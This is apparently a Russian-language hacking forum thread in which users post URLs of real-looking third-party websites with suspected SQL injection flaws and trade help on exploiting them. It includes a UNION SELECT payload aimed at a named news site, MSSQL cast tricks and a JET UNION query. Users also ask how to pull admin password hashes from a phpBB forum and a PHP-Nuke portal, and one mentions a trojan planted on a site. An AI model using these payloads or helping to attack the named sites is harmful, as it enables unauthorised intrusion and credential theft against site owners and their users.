![]() |
Помощь Sql Иньекции.
Если вы хотите что бы вам быстро оказали помощь оставляте ссыки на предпологаемые вами sql иньекции.
Здесь оставляем ссылки вида. PHP код:
|
ссыки? Блин, Кэш, глаза чуть не сломал пока читал месадж, исправь ошибки, не в обиду
ЗЫ __http://prod1.cmj.com/articles/display_article.php?id=6547215' 16 колонок, вывод не осилил Ошибки разные, отсюда делаю вывод что юнион должен работать, иначе бы типы данных игнорились: Код:
__http://prod1.cmj.com/articles/display_article.php?id=-6547215'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- |
Это Mssql. Учитывай это.
Выводимые данные не соответсвуют кодировке. |
Цитата:
|
cast(TABLE as nvarchar)
cast(TABLE as int) |
http://forum.pacan.net/kb.php?mode=cat&cat=23'
Не могу добраться до хэшей админа. Пхпбб. |
Помогите заюзать найденный SQL-inj
http://portal.migtel.ru/modules.php?name=Search
Если в поле поиска забито что-товроде 99' скрипт выдаёт явную ошибку. Из префиксов видно что cms - Nuke. Помогите составить запрос для вытаскивания хэша админа. |
а теперь признайтесь ктио туда троянца залил
|
офтоп
Тоже вот не хотелось новую тему создавать. офтоп На счет MSSQL, делаю такой вот запросик : ' UNION SELECT TOP 1 TABLE_NAME FROM users (post запросе) дайет вот такой ответ:Microsoft JET Database Engine ошибка '80040e14'. В таслицах или запрофах, высранных в запрофе на осъединение, не фовпадает чифло фтолсцов (повторил слово в слово!). Ну короче неправельно выбрано кол. столбцов, насколько я понял из MS.Press.MCAD.MCSE.MCDB - TOPом и задается кол. столбцов,тока сколька не cтавил TOP, все равно ему мало:),короче не правильный запросик, подскажите че нибудь. Да насчет INFORMATION_SCHEMA.TABLES в запросе - говорит что "таблицы таблиц" нету. |
Цитата:
Цитата:
|
| Время: 03:40 |